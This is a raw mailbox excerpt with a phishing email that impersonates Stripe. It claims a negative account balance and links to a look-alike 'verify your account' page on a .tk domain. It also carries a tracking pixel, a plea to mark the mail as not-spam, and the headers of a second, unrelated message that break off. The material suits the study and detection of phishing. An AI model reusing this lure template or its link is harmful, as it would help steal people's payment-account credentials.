From: Adelson de Araujo Pessoa <adelson.pessoa@unifap.br>
Message-ID: <1437836025.3632235.1484847631391.JavaMail.zimbra@unifap.br>
Subject: Quick Note On Your Account
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_3632234_452274794.1484847631385"
X-Originating-IP: [197.210.226.107]
X-Mailer: Zimbra 8.0.6_GA_5922 (zclient/8.0.6_GA_5922)
Thread-Topic: Quick Note On Your Account
Thread-Index: A0JvprMI9+EgpXuHajZVras8u9xrEQ==
To: undisclosed-recipients:;
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 22

------=_Part_3632234_452274794.1484847631385
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 7bit

















Stripe

Hi,This is a quick note on your Stripe account.
As it currently stands, your account has a negative balance of $119.08.We would love to find a way to get your account balance positive, and would appreciate if you get back to us so we can explore your options for doing so.
Click here to Logging and Verify your Account









 
NOTE:If you find this message in your JUNK or SPAM folder is as a result of your network provider. Ensure you mark it as NOT-SPAM or NOT-JUNK to enable your Link for Verification.













 
Thanks again for using Stripe, and we look forward to hearing from you!Best,
Adelson A.The Stripe Team



























------=_Part_3632234_452274794.1484847631385
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: 7bit

<div></div>
<div></div>
<div></div>
<div>
<table style="width: 100%;" cellspacing="0" cellpadding="30" border="0">
<tbody>
<tr>
<td class="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640frame" align="center" bgcolor="#eeeeee">
<table style="border-radius: 6px; width: 660px;" class="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640devicewidth" align="center" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff">
<tbody>
<tr>
<td style="border-radius: 5px; padding: 30px;" class="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640content">
<table class="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640devicewidth" style="width: 600px;" align="center" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff">
<tbody>
<tr>
<td style="line-height: 25px; font-family: helvetica,arial,sans-serif; color: #445566; font-size: 14px;" id="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640content-5" align="left">
<div style="text-align: center;"><span style="font-family: arial black,avant garde; font-size: xx-large;"><strong><span style="color: #666699;">Stripe</span></strong></span></div>
<div class="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640text">
<p><span style="font-size: 12px;">Hi,</span><br style="font-size: 12px;" /><span style="font-size: 12px;">This is a quick note on your Stripe account.</span></p>
<span style="font-size: 12px;">As it currently stands, your account has a negative balance of $119.08.</span><br style="font-size: 12px;" /><span style="font-size: 12px;">We would love to find a way to get your account balance positive, and would appreciate if you get back to us so we can explore your options for doing so.</span>
<p><a href="http://appineserve.tk/dashboard.stripe/" target="_blank" data-saferedirecturl="https://www.google.com/url?hl=en&amp;q=http://appineserve.tk/dashboard.stripe/..php?Balance%25Information-54647738TGHF66578%3DHFG&amp;source=gmail&amp;ust=1484896577466000&amp;usg=AFQjCNHaiHlDF6PnTrcYcmzFgMotZQI4eA">Click here to Logging and Verify your Account</a></p>
</div>
</td>
</tr>
</tbody>
</table>
<table class="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640devicewidth" style="width: 600px;" align="center" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff">
<tbody>
<tr>
<td style="border-top: #dddddd 1px solid;" class="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640doublespace" height="30">
<div><strong>&nbsp;</strong></div>
<div><strong>NOTE:</strong><span style="color: #ff0000;">If you find this message in your JUNK or SPAM folder is as a result of your network provider. Ensure you mark it as NOT-SPAM or NOT-JUNK to enable your Link for Verification.</span></div>
</td>
</tr>
</tbody>
</table>
<table class="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640devicewidth" style="width: 600px;" align="center" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff">
<tbody>
<tr>
<td align="left">
<table class="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640devicewidth" align="left" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td style="line-height: 23px; font-family: helvetica,arial,sans-serif; color: #445566; font-size: 14px;" id="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640content-9" align="left">
<div class="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640text">
<p style="margin-top: 0px; margin-bottom: 10px;"><span style="font-size: 12px;">&nbsp;</span></p>
<p style="margin-top: 0px; margin-bottom: 10px;"><span style="font-size: 12px;">Thanks again for using Stripe, and we look forward to hearing from you!</span><br style="font-size: 12px;" /><span style="font-size: 12px;">Best,</span></p>
<p style="margin-top: 0px; margin-bottom: 10px;"><strong>Adelson A.</strong><br style="font-size: 12px;" /><strong><span style="font-size: 12px;">The Stripe Team</span></strong></p>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table class="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640devicewidth" style="width: 660px;" align="center" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td style="line-height: 18px; font-family: arial,helvetica,sans-serif; color: #666666; font-size: 10px;" id="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640content-10" align="center">
<div class="m_-1152397385583711076m_5482947979995207493m_5992084193210795411gmail-m_-4484583840360779391m_4090494956553485640text"></div>
</td>
</tr>
</tbody>
</table>
<img alt="" src="https://ci6.googleusercontent.com/proxy/DPkhwB1I7ystmoIGWkOriw8DviHqxfJVx5mXxA3FFCyOJF5W0WJ58IlmsWEZkr0JHcOVY9z8oTnI7O_z07fz2_aM7Eu1Y-llYRG2pAAFcY_tylCv7OhZSs8VOpIM=s0-d-e1-ft#https://mailer.hostinger.io/o/51798117/68dfd11509d559343d9d5b124cbdeb14" /></td>
</tr>
</tbody>
</table>
</div>
------=_Part_3632234_452274794.1484847631385--

From jose@monkey.org Mon Jun 20 11:24:52 2016 +0000
Return-Path: mdcruz@capousd.org
Delivered-To: jose@monkey.org
X-FDA: 71647681224.07.7A46A02
Received: from filter.hostedemail.com (10.5.16.248.rfc1918.com [10.5.16.248])
	by smtpin07.b.hostedemail.com (Postfix) with ESMTP id B461E8D15A;
	Mon, 20 Jun 2016 11:24:52 +0000 (UTC)
X-Spam-Summary: 50,0,0,87f8f097c6d68153,d41d8cd98f00b204,mdcruz@capousd.org,:,RULES_HIT:10:41:72:355:379:387:582:599:960:962:967:973:983:988:989:1152:1189:1208:1221:1260:1263:1313:1314:1345:1359:1381:1431:1436:1437:1516:1517:1518:1535:1541:1566:1575:1588:1589:1592:1594:1711:1714:1730:1749:1776:1792:2525:2527:2551:2553:2561:2564:2682:2685:2859:2890:2900:2916:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3522:3523:3586:3866:3867:3870:3871:3872:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4860:5007:6117:6238:6261:6650:6678:6703:8512:8518:8599:8603:8957:9025:9545:9855:9873:10004:10049:10346:10400:10482:11473:11537:11656:11658:11914:12043:12050:12225:12291:12438:12519:12555:12679:12683:12740:12776:13139:13237:13439:14093:14096:14110:14181:14651:14659:14721:19901:19997:21067:21433:30001:30051:30054:30069:30070:30090:30091,0,RBL:104.249.126.100:@capousd.org:.lbl8.mailshell.net-62.8.255.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netche
 ck:none,
X-HE-Tag: lock58_81c7aa8f9a14f
X-Filterd-Recvd-Size: 5960
Received: from dist-unx-iron-2.capousd.org (dist-unx-iron-2.capousd.org [104.249.126.100])
	by imf23.b.hostedemail.com (Postfix) with ESMTP;
	Mon, 20 Jun 2016 11:24:51 +0000 (UTC)
Authentication-Results: dist-unx-iron-2.capousd.org; spf=None smtp.pra=mdcruz@capousd.org; spf=None smtp.mailfrom=mdcruz@capousd.org; spf=None smtp.helo=postmaster@dist-unx-iron-1.capousd.org
Received-SPF: None (dist-unx-iron-2.capousd.org: no sender
  authenticity information available from domain of
  mdcruz@capousd.org) identity=pra; client-ip=172.16.129.1;
  receiver=dist-unx-iron-2.capousd.org;
  envelope-from="mdcruz@capousd.org";
  x-sender="mdcruz@capousd.org"; x-conformance=sidf_compatible
Received-SPF: None (dist-unx-iron-2.capousd.org: no sender
  authenticity information available from domain of
  mdcruz@capousd.org) identity=mailfrom;
  client-ip=172.16.129.1; receiver=dist-unx-iron-2.capousd.org;
  envelope-from="mdcruz@capousd.org";
  x-sender="mdcruz@capousd.org"; x-conformance=sidf_compatible
Received-SPF: None (dist-unx-iron-2.capousd.org: no sender
  authenticity information available from domain of
  postmaster@dist-unx-iron-1.capousd.org) identity=helo;
  client-ip=172.16.129.1; receiver=dist-unx-iron-2.capousd.org;
  envelope-from="mdcruz@capousd.org";
  x-sender="postmaster@dist-unx-iron-1.capousd.org";
  x-conformance=sidf_compatible
IronPort-PHdr: =?us-ascii?q?9a23=3AVS7ywByoZVki1fvXCy+O+j09IxM/srCxBDY+r6Qd?=
 =?us-ascii?q?0ekfIJqq85mqBkHD//Il1AaPBtWKraMZwLGI+4nbGkU+or+5+EgYd5JNUxJXwe?=
 =?us-ascii?q?43pCcHRPC/NEvgMfTxZDY7FskRHHVs/nW8LFQHUJ2mPw6anHS+4HYoFwnlMkIt?=
 =?us-ascii?q?f6KuSt+U3pn8jL760qaQSjsLrQL1Wal1IhSyoFeZnegtqqwmFJwMzADUqGBDYe?=
 =?us-ascii?q?VcyDAgD1uSmxHh+pX4p8Y7oGxVuuk69shPGZndN6o5QLhURHR9ayFmrOPxshyW?=
 =?us-ascii?q?ByCV+2lYGkAfiBtBSySDplmuW5v6qDbonuF0wC6HJsGwSqo7D2fxp5x3QQPl3X?=
 =?us-ascii?q?9UfwUy93va35cogQ=3D=3D?=
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: =?us-ascii?q?A2EkegB20WdX/wGBEKxdgnCBJHEMBqZ3B?=
 =?us-ascii?q?IJykHNogREegW+ECgIogUQOAQEBAQEBAQECgQkfAQEgDgGBYYEDWzQIAQEBBIE?=
 =?us-ascii?q?JAgEIBAkJARYBARcyHQgBAR+FaoJMsxiMVgEBAQcBAQEBI4p0hBIRAR49CQGCS?=
 =?us-ascii?q?BuCLwWOLYpJAYYFhVoOhDw3hyWFRo93OAaEBm6EYIQmDTZ/AQEF?=
X-IronPort-AV: E=Sophos;i="5.26,498,1459839600"; 
   d="scan'208,217";a="7276737"
Received: from unknown (HELO dist-unx-iron-1.capousd.org) ([172.16.129.1])
  by dist-unx-iron-2.capousd.org with ESMTP; 20 Jun 2016 04:24:49 -0700
Received: from DIST-WIN-MBX-2.cusdnet.org ([::1]) by
 DIST-WIN-CAS-1.cusdnet.org ([::1]) with mapi id 14.02.0318.004; Mon, 20 Jun
 2016 04:24:48 -0700
